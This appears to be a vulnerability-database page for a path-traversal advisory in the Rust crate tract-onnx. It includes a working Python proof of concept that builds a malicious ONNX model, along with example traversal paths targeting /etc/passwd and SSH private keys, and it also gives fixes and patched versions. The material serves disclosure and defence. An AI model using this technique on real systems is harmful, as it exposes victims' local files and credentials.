tract-onnx CVE-2026-55832
MEDIUMSeverity by source
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L
AV:N because the malicious model is delivered over the internet (model hubs); UI:R because the victim must load it; no write or code execution impact.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
tract (the tract-onnx crate) resolves an ONNX tensor's external-data location by joining it onto the model directory without any sanitization. Because location comes from the (untrusted) .onnx file, a malicious model can make tract open and read an arbitrary local file at load time, with the file's contents flowing into the model's tensors / inference output (read-only file disclosure). This is the ONNX external-data path-traversal class that the reference onnx library hardened over several CVEs; tract resolves location itself and was never hardened.
Details
In onnx/src/tensor.rs, get_external_resources() builds the path with no checks:
let location = /* tensor.external_data "location" value - attacker-controlled */;
let p = PathBuf::from(path).join(location); // no is_absolute / ".." / canonicalize / containment check
provider.read_bytes_from_path(&mut tensor_data, &p, offset, length)?; // Mmap::map(File::open(p)) by defaultPath::joinwith an absolutelocation(e.g./etc/passwd) discards the base directory →p = /etc/passwd.- A relative
../../../../etc/passwdvalue is not normalized → directory traversal. - The default
MmapDataResolver(onnx/src/data_resolver.rs) thenmmaps the file and copiesmmap[offset..offset+length]into the tensor.offset/lengthare also taken from the file; an out-of-range slice panics (DoS).
No is_absolute, .., canonicalize, or containment check exists anywhere on this path (tensor.rs, model.rs, data_resolver.rs).
Reachable from the standard public API: model_for_path(p) (onnx/src/model.rs) sets model_dir = p.parent() and calls load_tensor(proto, model_dir) → get_external_resources(.., model_dir).
PoC
Tested on tract-onnx 0.21.16 (crates.io), Rust 1.96.
- A canary file the model must not be able to read:
/tmp/tract_canary_secret.txt → TRACT-EXTDATA-TRAVERSAL-CANARY-7f3a2b
- Build a small
evil.onnxwith aUINT8[37]initializer whoseexternal_dataislocation=/tmp/tract_canary_secret.txt(absolute),offset=0,length=37, fed throughIdentityto the output (raw protobuf serialization):
import onnx
from onnx import helper, TensorProto, StringStringEntryProto
N = 37; LOC = "/tmp/tract_canary_secret.txt"
# absolute -> Path::join discards the base dir
w = TensorProto(); w.name = "W"; w.data_type = TensorProto.UINT8
w.dims.extend([N]); w.data_location = TensorProto.EXTERNAL
for k, v in [("location", LOC), ("offset", "0"), ("length", str(N))]:
e = StringStringEntryProto(); e.key = k; e.value = v; w.external_data.append(e)
node = helper.make_node("Identity", ["W"], ["Y"])
out = helper.make_tensor_value_info("Y", TensorProto.UINT8, [N])
g = helper.make_graph([node], "g", [], [out], initializer=[w])
m = helper.make_model(g, opset_imports=[helper.make_opsetid("", 13)])
open("evil.onnx", "wb").write(m.SerializeToString())- Victim loads the untrusted model with the standard API:
let model = tract_onnx::onnx().model_for_path("evil.onnx")?;
let out = model.into_optimized()?.into_runnable()?.run(tvec!())?;
let bytes: Vec<u8> = out[0].to_array_view::<u8>()?.iter().cloned().collect();
println!("{:?}", String::from_utf8_lossy(&bytes));Output:
"TRACT-EXTDATA-TRAVERSAL-CANARY-7f3a2b"i.e. the contents of the arbitrary local file were read by tract and surfaced in the inference output.
Impact
Read-only arbitrary local file disclosure when an application uses tract to load an untrusted or shared ONNX model (model hubs, multi-file repos, user uploads). The file content is recoverable from the model's tensors / inference output. Secondary: denial of service (panic) via out-of-bounds offset/length. No write or code execution.
Suggested fix
Reject absolute location and any .. component, then canonicalize and verify the resolved path stays within the model directory (mirroring onnx 1.22.0's resolve_external_data_location); reject symlinks; validate offset/length against the file size before slicing.
AnalysisAI
Arbitrary local file disclosure in the Rust crate tract-onnx (by Sonos) allows an attacker who supplies a malicious ONNX model file to read arbitrary files from the victim's filesystem at model-load time, with file contents surfaced directly in inference tensor output. The root cause is that get_external_resources() in onnx/src/tensor.rs passes the attacker-controlled location field of ONNX external-data tensors directly to PathBuf::join() without sanitization, enabling both absolute-path overrides and relative ../ traversal. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that an application calls `tract_onnx::onnx().model_for_path()` (or equivalent API) on an attacker-controlled or attacker-influenced ONNX model file. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Despite a moderate CVSS base score of 6.1 (AV:L/AC:L/PR:N/UI:R), the real-world risk is materially higher in the primary threat model of this crate. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker publishes a malicious ONNX model (evil.onnx) to a public model hub or submits it as a user upload to a platform using tract-onnx for inference. The model contains a UINT8 tensor whose `external_data.location` is set to `/etc/passwd` (absolute path override) or `../../../../home/user/.ssh/id_rsa` (directory traversal). … |
| Remediation | Upgrade tract-onnx to a patched release: 0.21.17 for the 0.21.x line, 0.22.3 for the 0.22.x line, or 0.23.2 for the 0.23.x line. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-h668-6x6g-f8r5